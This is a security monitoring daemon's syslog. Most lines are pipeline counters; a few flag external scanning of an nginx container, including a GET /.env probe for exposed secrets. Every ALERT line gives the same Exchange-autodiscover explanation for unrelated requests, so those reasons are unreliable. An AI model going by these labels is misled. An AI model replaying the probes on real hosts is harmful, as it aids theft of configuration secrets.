Mar 20 14:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:19:01.949442 [observer] Patterns: hash=5864 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:19:31.939903 [observer] Pipeline: processed=6299 pattern_hits=5880 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:19:31.939934 [observer] Patterns: hash=5866 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:20:01.951665 [observer] Pipeline: processed=6303 pattern_hits=5884 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:20:01.951699 [observer] Patterns: hash=5870 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:20:31.947750 [observer] Pipeline: processed=6305 pattern_hits=5886 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:20:31.947779 [observer] Patterns: hash=5872 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:21:01.956796 [observer] Pipeline: processed=6309 pattern_hits=5890 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:21:01.956836 [observer] Patterns: hash=5876 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:21:31.948824 [observer] Pipeline: processed=6311 pattern_hits=5892 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:21:31.948858 [observer] Patterns: hash=5878 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:22:01.950434 [observer] Pipeline: processed=6315 pattern_hits=5896 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:22:01.950459 [observer] Patterns: hash=5882 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:22:31.944834 [observer] Pipeline: processed=6317 pattern_hits=5898 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:22:31.944861 [observer] Patterns: hash=5884 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:23:01.948805 [observer] Pipeline: processed=6321 pattern_hits=5902 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:23:01.948834 [observer] Patterns: hash=5888 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:23:31.938179 [observer] Pipeline: processed=6325 pattern_hits=5906 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:23:31.938208 [observer] Patterns: hash=5892 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:24:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:24:02.002382 [observer] Pipeline: processed=6327 pattern_hits=5908 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:24:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:24:02.002417 [observer] Patterns: hash=5894 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:24:31.940753 [observer] Pipeline: processed=6331 pattern_hits=5912 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:24:31.940783 [observer] Patterns: hash=5898 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:25:01.970513 [observer] Pipeline: processed=6333 pattern_hits=5914 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:25:01.970543 [observer] Patterns: hash=5900 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:25:31.939263 [observer] Pipeline: processed=6337 pattern_hits=5918 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:25:31.939287 [observer] Patterns: hash=5904 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:26:01.958914 [observer] Pipeline: processed=6339 pattern_hits=5920 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:26:01.958955 [observer] Patterns: hash=5906 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:26:31.954429 [observer] Pipeline: processed=6341 pattern_hits=5922 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:26:31.954457 [observer] Patterns: hash=5908 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:27:01.966218 [observer] Pipeline: processed=6345 pattern_hits=5926 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:27:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:27:01.966253 [observer] Patterns: hash=5912 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:27:31.948067 [observer] Pipeline: processed=6347 pattern_hits=5928 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:27:31.948100 [observer] Patterns: hash=5914 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:28:01.985107 [observer] Pipeline: processed=6353 pattern_hits=5934 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:28:01.985211 [observer] Patterns: hash=5920 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:28:31.941211 [observer] Pipeline: processed=6355 pattern_hits=5936 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:28:31.941239 [observer] Patterns: hash=5922 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:29:01.965014 [observer] Pipeline: processed=6359 pattern_hits=5940 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:29:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:29:01.965087 [observer] Patterns: hash=5926 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:29:31.938928 [observer] Pipeline: processed=6361 pattern_hits=5942 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:29:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:29:31.938954 [observer] Patterns: hash=5928 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:30:01.959870 [observer] Pipeline: processed=6363 pattern_hits=5944 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:30:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:30:01.959907 [observer] Patterns: hash=5930 prefix=14 regex=0 contains=0 deny=69 alert=560 suppress=0 misses=419
Mar 20 14:30:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:30:16.211140 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An nginx open() failed with a missing file error, which can indicate misconfiguration, missing resources, or probing. Not definitively malicious but warrants review. Line=2026-03-20T14:30:16.210889013Z 2026/03/20 14:30:16 [error] 422#422: *751386 open() "/usr/share/nginx/default/mcp" failed (2: No such file or directory), client: 185.226.197.32, server: _, request: "PO...
Mar 20 14:30:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:30:16.211958 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:30:16.211016411Z 185.226.197.32 - - [20/Mar/2026:14:30:16 +0000] "54.200.221.0" "POST /mcp HTTP/2.0" 404 2401 "-" "python-httpx/0.28.1" "-"
Mar 20 14:30:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:30:16.339142 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Open() failed due to missing file for a request to /sse; could indicate misconfiguration or missing resources but not definitive malicious activity. Line=2026-03-20T14:30:16.338863016Z 2026/03/20 14:30:16 [error] 422#422: *751386 open() "/usr/share/nginx/default/sse" failed (2: No such file or directory), client: 185.226.197.32, server: _, request: "GE...
Mar 20 14:30:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:30:16.339221 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:30:16.338874956Z 185.226.197.32 - - [20/Mar/2026:14:30:16 +0000] "54.200.221.0" "GET /sse HTTP/2.0" 404 2401 "-" "python-httpx/0.28.1" "-"
Mar 20 14:30:16 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:30:16.865555 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:30:16.865055460Z 185.226.197.35 - - [20/Mar/2026:14:30:16 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0....
Mar 20 14:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:30:31.938533 [observer] Pipeline: processed=6374 pattern_hits=5955 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:30:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:30:31.938563 [observer] Patterns: hash=5941 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=419
Mar 20 14:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:31:01.977216 [observer] Pipeline: processed=6376 pattern_hits=5957 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:31:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:31:01.977250 [observer] Patterns: hash=5943 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=419
Mar 20 14:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:31:31.936790 [observer] Pipeline: processed=6380 pattern_hits=5961 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:31:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:31:31.936818 [observer] Patterns: hash=5947 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=419
Mar 20 14:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:32:01.962201 [observer] Pipeline: processed=6382 pattern_hits=5963 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:32:01.962268 [observer] Patterns: hash=5949 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=419
Mar 20 14:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:32:31.938744 [observer] Pipeline: processed=6386 pattern_hits=5967 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:32:31.938772 [observer] Patterns: hash=5953 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=419
Mar 20 14:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:33:01.957067 [observer] Pipeline: processed=6390 pattern_hits=5971 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:33:01.957100 [observer] Patterns: hash=5957 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=419
Mar 20 14:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:33:31.953295 [observer] Pipeline: processed=6392 pattern_hits=5973 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:33:31.953325 [observer] Patterns: hash=5959 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=419
Mar 20 14:34:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:34:02.020651 [observer] Pipeline: processed=6396 pattern_hits=5977 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:34:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:34:02.020688 [observer] Patterns: hash=5963 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=419
Mar 20 14:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:34:31.949323 [observer] Pipeline: processed=6398 pattern_hits=5979 llm_calls=419 llm_errors=3 learned=5
Mar 20 14:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:34:31.949350 [observer] Patterns: hash=5965 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=419
Mar 20 14:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:35:01.974878 [observer] Pipeline: processed=6403 pattern_hits=5983 llm_calls=420 llm_errors=3 learned=5
Mar 20 14:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:35:01.974922 [observer] Patterns: hash=5969 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=420
Mar 20 14:35:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:35:14.106385 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 14:35:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:35:14.106427 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 14:35:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:35:25.187665 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.58 action=alert pattern_type=
Mar 20 14:35:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:35:25.187745 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=Netdata tc-qos-helper cannot find its configuration file, a benign warning but may indicate misconfiguration or incomplete setup. Line=2026-03-20T14:35:01.899456936Z 2026-03-20 14:35:01: tc-qos-helper.sh: WARNING: Cannot find file '/usr/lib/netdata/conf.d/tc-qos-helper.conf'.
Mar 20 14:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:35:31.507453 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 14:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:35:31.507485 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=Missing configuration file warning; could indicate misconfiguration or drift but not necessarily malicious. Line=2026-03-20T14:35:01.901543189Z 2026-03-20 14:35:01: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.
Mar 20 14:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:35:31.938554 [observer] Pipeline: processed=6407 pattern_hits=5985 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:35:31.938584 [observer] Patterns: hash=5971 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:36:01.951480 [observer] Pipeline: processed=6411 pattern_hits=5989 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:36:01.951658 [observer] Patterns: hash=5975 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:36:31.939243 [observer] Pipeline: processed=6413 pattern_hits=5991 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:36:31.939284 [observer] Patterns: hash=5977 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:37:01.969889 [observer] Pipeline: processed=6415 pattern_hits=5993 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:37:01.969917 [observer] Patterns: hash=5979 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:37:31.938470 [observer] Pipeline: processed=6419 pattern_hits=5997 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:37:31.938503 [observer] Patterns: hash=5983 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:38:01.968578 [observer] Pipeline: processed=6423 pattern_hits=6001 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:38:01.968645 [observer] Patterns: hash=5987 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:38:31.937739 [observer] Pipeline: processed=6427 pattern_hits=6005 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:38:31.937775 [observer] Patterns: hash=5991 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:39:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:39:02.011286 [observer] Pipeline: processed=6429 pattern_hits=6007 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:39:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:39:02.011325 [observer] Patterns: hash=5993 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:39:31.936616 [observer] Pipeline: processed=6433 pattern_hits=6011 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:39:31.936644 [observer] Patterns: hash=5997 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:40:01.973774 [observer] Pipeline: processed=6435 pattern_hits=6013 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:40:01.974040 [observer] Patterns: hash=5999 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:40:31.952634 [observer] Pipeline: processed=6437 pattern_hits=6015 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:40:31.952661 [observer] Patterns: hash=6001 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:41:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:41:02.072673 [observer] Pipeline: processed=6441 pattern_hits=6019 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:41:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:41:02.072708 [observer] Patterns: hash=6005 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:41:31.938495 [observer] Pipeline: processed=6443 pattern_hits=6021 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:41:31.938522 [observer] Patterns: hash=6007 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:42:02.154951 [observer] Pipeline: processed=6447 pattern_hits=6025 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:42:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:42:02.157562 [observer] Patterns: hash=6011 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:42:31.946282 [observer] Pipeline: processed=6449 pattern_hits=6027 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:42:31.946306 [observer] Patterns: hash=6013 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:43:01.979544 [observer] Pipeline: processed=6453 pattern_hits=6031 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:43:01.979583 [observer] Patterns: hash=6017 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:43:31.936502 [observer] Pipeline: processed=6457 pattern_hits=6035 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:43:31.936525 [observer] Patterns: hash=6021 prefix=14 regex=0 contains=0 deny=72 alert=562 suppress=0 misses=422
Mar 20 14:43:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:43:58.487782 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T14:43:58.487495007Z 2026/03/20 14:43:58 [error] 422#422: *754976 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 216.74.115.23, server: _, request: "GE...
Mar 20 14:43:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:43:58.487869 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T14:43:58.487590612Z 216.74.115.23 - - [20/Mar/2026:14:43:58 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, lik...
Mar 20 14:43:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:43:58.899470 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T14:43:58.899237372Z 216.74.115.23 - - [20/Mar/2026:14:43:58 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Ge...
Mar 20 14:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:44:01.955350 [observer] Pipeline: processed=6462 pattern_hits=6040 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:44:01.955389 [observer] Patterns: hash=6026 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:44:31.942092 [observer] Pipeline: processed=6466 pattern_hits=6044 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:44:31.942127 [observer] Patterns: hash=6030 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:45:01.962923 [observer] Pipeline: processed=6468 pattern_hits=6046 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:45:01.962956 [observer] Patterns: hash=6032 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:45:31.940043 [observer] Pipeline: processed=6472 pattern_hits=6050 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:45:31.940080 [observer] Patterns: hash=6036 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:46:01.959883 [observer] Pipeline: processed=6474 pattern_hits=6052 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:46:01.959913 [observer] Patterns: hash=6038 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:46:31.939012 [observer] Pipeline: processed=6477 pattern_hits=6055 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:46:31.939574 [observer] Patterns: hash=6041 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:47:01.959245 [observer] Pipeline: processed=6480 pattern_hits=6058 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:47:01.959282 [observer] Patterns: hash=6044 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:47:31.946678 [observer] Pipeline: processed=6482 pattern_hits=6060 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:47:31.946703 [observer] Patterns: hash=6046 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:48:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:48:02.067819 [observer] Pipeline: processed=6486 pattern_hits=6064 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:48:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:48:02.067991 [observer] Patterns: hash=6050 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:48:31.944519 [observer] Pipeline: processed=6490 pattern_hits=6068 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:48:31.944554 [observer] Patterns: hash=6054 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:49:01.950726 [observer] Pipeline: processed=6494 pattern_hits=6072 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:49:01.950758 [observer] Patterns: hash=6058 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
Mar 20 14:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:49:31.950122 [observer] Pipeline: processed=6496 pattern_hits=6074 llm_calls=422 llm_errors=3 learned=5
Mar 20 14:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 14:49:31.950177 [observer] Patterns: hash=6060 prefix=14 regex=0 contains=0 deny=73 alert=564 suppress=0 misses=422
